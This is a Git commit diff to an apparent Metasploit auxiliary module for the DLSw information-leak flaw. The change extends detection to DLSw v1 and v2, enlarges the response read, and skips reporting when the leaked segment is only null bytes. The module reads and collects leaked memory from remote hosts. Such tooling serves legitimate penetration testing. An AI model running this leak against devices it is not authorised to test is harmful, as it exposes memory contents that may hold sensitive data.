added DLSw v1 and v2 check, added check for \x00 in leak segment
parent
e9750e2df8
commit
3aecd3a10e
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
"#{rhost}:#{rport}"
|
"#{rhost}:#{rport}"
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_response(size = 8)
|
def get_response(size = 72)
|
||||||
connect
|
connect
|
||||||
response = sock.get_once(size)
|
response = sock.get_once(size)
|
||||||
disconnect
|
disconnect
|
||||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if response.blank?
|
if response.blank?
|
||||||
vprint_status("#{peer}: no response")
|
vprint_status("#{peer}: no response")
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
elsif response[0..3] == "\x31\x48\x01\x5b"
|
elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
|
||||||
vprint_good("#{peer}: Detected DLSw protocol")
|
vprint_good("#{peer}: Detected DLSw protocol")
|
||||||
report_service(
|
report_service(
|
||||||
host: rhost,
|
host: rhost,
|
||||||
|
@ -71,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
)
|
)
|
||||||
# TODO: check that response has something that truly indicates it is vulnerable
|
# TODO: check that response has something that truly indicates it is vulnerable
|
||||||
# and not simply that it responded
|
# and not simply that it responded
|
||||||
|
unless response[18..72].scan(/\x00/).length == 54
|
||||||
print_good("#{peer}: leaked #{response.length} bytes")
|
print_good("#{peer}: leaked #{response.length} bytes")
|
||||||
report_vuln(
|
report_vuln(
|
||||||
host: rhost,
|
host: rhost,
|
||||||
|
@ -80,6 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
info: "Module #{fullname} collected #{response.length} bytes"
|
info: "Module #{fullname} collected #{response.length} bytes"
|
||||||
)
|
)
|
||||||
Exploit::CheckCode::Vulnerable
|
Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
else
|
else
|
||||||
vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
|
vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
|
@ -92,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
dlsw_data = ''
|
dlsw_data = ''
|
||||||
until dlsw_data.length > datastore['LEAK_AMOUNT']
|
until dlsw_data.length > datastore['LEAK_AMOUNT']
|
||||||
response = get_response(72)
|
response = get_response
|
||||||
dlsw_data << response[18..72] unless response.blank?
|
dlsw_data << response[18..72] unless response.blank?
|
||||||
end
|
end
|
||||||
loot_and_report(dlsw_data)
|
loot_and_report(dlsw_data)
|
||||||
|
|
Loading…
Reference in New Issue